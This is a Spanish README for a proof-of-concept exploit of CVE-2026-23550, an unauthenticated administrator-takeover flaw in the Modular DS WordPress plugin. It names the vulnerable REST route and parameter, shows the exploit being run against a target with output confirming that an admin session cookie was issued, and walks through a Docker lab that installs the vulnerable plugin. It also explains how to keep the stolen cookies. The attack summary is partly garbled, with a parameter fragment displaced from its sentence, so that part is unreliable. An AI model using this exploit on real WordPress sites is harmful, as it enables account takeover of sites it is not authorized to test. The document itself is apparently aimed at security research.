
CVE-2026-23550 - Plugin de WordPress Modular DS **Acceso de Administrador No Autenticado**
Prueba de Concepto (PoC) que demuestra CVE-2026-23550 - toma de control crítica de cuenta de administrador sin autenticación en el plugin de WordPress Modular DS (versiones ≤2.5.1). Explotado activamente en la naturaleza.

Resumen del Ataque: El enrutamiento defectuoso de la API REST en /api/modular-connector/login omite la autenticación de WordPress cuando , otorgando cookies de sesión de administrador sin autenticación.
origin=mo# PoC listo para producción
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Cookie de sesión de administrador emitida
El endpoint REST afectado es accesible exclusivamente a través del mecanismo ?rest_route=; el acceso directo mediante /wp-json/ puede no estar disponible. La vulnerabilidad permite acceso sin autenticación sin credenciales ni validación de nonce. La emisión exitosa de una cookie de sesión de administrador de WordPress constituye la confirmación de la explotación. Esta prueba de concepto no ejecuta ninguna acción administrativa. Se utiliza Modular DS versión 2.5.0 durante las pruebas.
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
Espera a: "ready for connections"
curl http://localhost:8080/?rest_route=/
Esperado:
{
"name": "...",
"namespaces": [...]
}
Si esto falla → DETENTE, el entorno está roto.
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
Nota: Si quieres las cookies en un archivo de texto, elimina "rm -f "$COOKIE_JAR"" del archivo poc.sh.
Licencia MIT - Solo para investigación de seguridad y pruebas de penetración autorizadas. No para uso malicioso. Divulga de manera responsable.
Este PoC es solo para pruebas de seguridad autorizadas. El uso no autorizado contra sistemas de producción es ilegal. Reporta los hallazgos a los mantenedores del plugin.